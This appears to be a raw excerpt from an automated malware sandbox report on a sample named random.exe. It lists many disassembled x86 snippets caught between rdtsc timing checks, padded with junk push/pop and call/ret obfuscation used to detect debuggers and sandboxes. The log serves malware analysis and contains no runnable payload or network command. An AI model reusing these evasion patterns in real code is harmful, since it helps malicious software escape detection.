Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C3C8A second address: 9C3D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12452h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D193Ah], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F5FF4F12448h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D30D7h], edi 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+12466CC6h], esi 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007F5FF4F12451h 0x00000044 popad 0x00000045 jmp 00007F5FF4F1244Bh 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jg 00007F5FF4F12446h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C3D0A second address: 9C3D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C3D24 second address: 9C3D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BF03E second address: 9BF115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FF4AFF009h 0x00000008 jmp 00007F5FF4AFEFFEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F5FF4AFEFF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d jnp 00007F5FF4AFEFF8h 0x00000033 mov edi, eax 0x00000035 push dword ptr fs:[00000000h] 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007F5FF4AFEFF8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 call 00007F5FF4AFF003h 0x0000005b mov dword ptr [ebp+122D3301h], edi 0x00000061 pop ebx 0x00000062 mov dword ptr [ebp+124490CCh], edi 0x00000068 mov dword ptr fs:[00000000h], esp 0x0000006f movzx ebx, di 0x00000072 mov ebx, dword ptr [ebp+122D219Eh] 0x00000078 mov eax, dword ptr [ebp+122D0ECDh] 0x0000007e mov ebx, 51B07A8Fh 0x00000083 push FFFFFFFFh 0x00000085 mov bl, cl 0x00000087 mov bx, 191Dh 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jno 00007F5FF4AFF000h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BF115 second address: 9BF11B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9BF11B second address: 9BF11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C111B second address: 9C1130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F5FF4F12446h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C2F23 second address: 9C2F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C4C9E second address: 9C4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C4CA4 second address: 9C4CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C1FAF second address: 9C1FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F5FF4F12446h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f movzx edi, si 0x00000012 push dword ptr fs:[00000000h] 0x00000019 and edi, dword ptr [ebp+122D36B2h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 sub dword ptr [ebp+124490CCh], ebx 0x0000002c mov eax, dword ptr [ebp+122D01ADh] 0x00000032 or edi, dword ptr [ebp+122D2D87h] 0x00000038 push FFFFFFFFh 0x0000003a push eax 0x0000003b mov edi, dword ptr [ebp+122D31F8h] 0x00000041 pop edi 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 jbe 00007F5FF4F12448h 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C5DF9 second address: 9C5DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C4F64 second address: 9C4F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jg 00007F5FF4F1244Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C6D6D second address: 9C6D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C6038 second address: 9C6040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7C1B second address: 9C7C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7C21 second address: 9C7C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7C25 second address: 9C7C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5FF4AFF007h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7E0C second address: 9C7E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CAE33 second address: 9CAE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7E12 second address: 9C7E24 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C8DD9 second address: 9C8DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CAE37 second address: 9CAE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7E24 second address: 9C7E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7E29 second address: 9C7E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C6F13 second address: 9C6F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CF44A second address: 9CF4D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5FF4F12448h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D3B03h], edi 0x00000013 push 00000000h 0x00000015 jmp 00007F5FF4F12452h 0x0000001a jo 00007F5FF4F1244Bh 0x00000020 sbb di, 0E3Ch 0x00000025 push 00000000h 0x00000027 jmp 00007F5FF4F12458h 0x0000002c jmp 00007F5FF4F12451h 0x00000031 xchg eax, esi 0x00000032 push ebx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 jmp 00007F5FF4F12459h 0x0000003b popad 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jbe 00007F5FF4F12446h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CBE6D second address: 9CBE72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CF4D4 second address: 9CF4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9C7EF9 second address: 9C7F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFEFFAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CF4DA second address: 9CF4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CBF1B second address: 9CBF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9CF6C1 second address: 9CF6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D91E3 second address: 9D9212 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jnp 00007F5FF4AFEFF6h 0x0000000d jmp 00007F5FF4AFF004h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 jl 00007F5FF4AFEFFCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9D8AA2 second address: 9D8AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DD951 second address: 9DD95B instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DD95B second address: 9DD98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FF4F12450h 0x00000008 jp 00007F5FF4F12446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jng 00007F5FF4F1244Ch 0x0000001a jp 00007F5FF4F12446h 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F5FF4F12446h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DD98E second address: 9DD992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DD992 second address: 9DD9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DDA54 second address: 9DDA84 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F5FF4AFEFFAh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FF4AFF004h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DDA84 second address: 9DDAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d je 00007F5FF4F12448h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F5FF4F12454h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9DDAB8 second address: 9DDABE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5DD8 second address: 9E5DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5DDE second address: 9E5DF1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5FF4AFEFFEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E4AEB second address: 9E4AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E4AEF second address: 9E4AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5FF4AFEFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E4AFF second address: 9E4B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5215 second address: 9E5219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5219 second address: 9E524A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F5FF4F12464h 0x00000013 jmp 00007F5FF4F12452h 0x00000018 jmp 00007F5FF4F1244Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E57D6 second address: 9E57DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5985 second address: 9E598D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5C3F second address: 9E5C7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF009h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5FF4AFF011h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9E5C7F second address: 9E5C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED680 second address: 9ED6A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED6A0 second address: 9ED6A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED6A6 second address: 9ED6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F5FF4AFEFF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9ED6B2 second address: 9ED6B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5076 second address: 9B507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B507A second address: 9B5080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5080 second address: 9B5085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5085 second address: 9B50C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5FF4F12446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D2153h], eax 0x00000016 lea eax, dword ptr [ebp+1247ADF5h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F5FF4F12448h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B50C6 second address: 9B50D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B50D5 second address: 99E55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5FF4F12454h 0x0000000b ja 00007F5FF4F12446h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F5FF4F12448h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D2442h], ecx 0x00000034 call dword ptr [ebp+122D36B2h] 0x0000003a pushad 0x0000003b jmp 00007F5FF4F12455h 0x00000040 jl 00007F5FF4F12452h 0x00000046 je 00007F5FF4F12446h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B51D0 second address: 9B51DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FF4AFEFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B51DA second address: 9B51DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5658 second address: 9B5669 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jng 00007F5FF4AFEFFEh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5704 second address: 9B575A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5FF4F1245Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5FF4F12459h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F5FF4F1244Dh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B575A second address: 9B5760 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5760 second address: 9B5820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F5FF4F1244Ah 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F5FF4F12448h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d call 00007F5FF4F12449h 0x00000032 push edi 0x00000033 push edx 0x00000034 jmp 00007F5FF4F1244Ch 0x00000039 pop edx 0x0000003a pop edi 0x0000003b push eax 0x0000003c pushad 0x0000003d je 00007F5FF4F1244Ch 0x00000043 js 00007F5FF4F12446h 0x00000049 push edi 0x0000004a push esi 0x0000004b pop esi 0x0000004c pop edi 0x0000004d popad 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 jmp 00007F5FF4F12455h 0x00000057 mov eax, dword ptr [eax] 0x00000059 jnc 00007F5FF4F1245Bh 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 pushad 0x00000064 jnl 00007F5FF4F1244Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5820 second address: 9B5824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B592B second address: 9B5935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5FF4F12446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5935 second address: 9B5972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F5FF4AFEFF8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jc 00007F5FF4AFEFFAh 0x0000002b mov dx, 2AA4h 0x0000002f push eax 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jc 00007F5FF4AFEFF6h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B5972 second address: 9B5976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B60E0 second address: 9B60E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6265 second address: 9B6269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6269 second address: 9B6274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F5FF4AFEFF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B645A second address: 9B6465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5FF4F12446h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6465 second address: 9B6474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9B6474 second address: 9B6479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
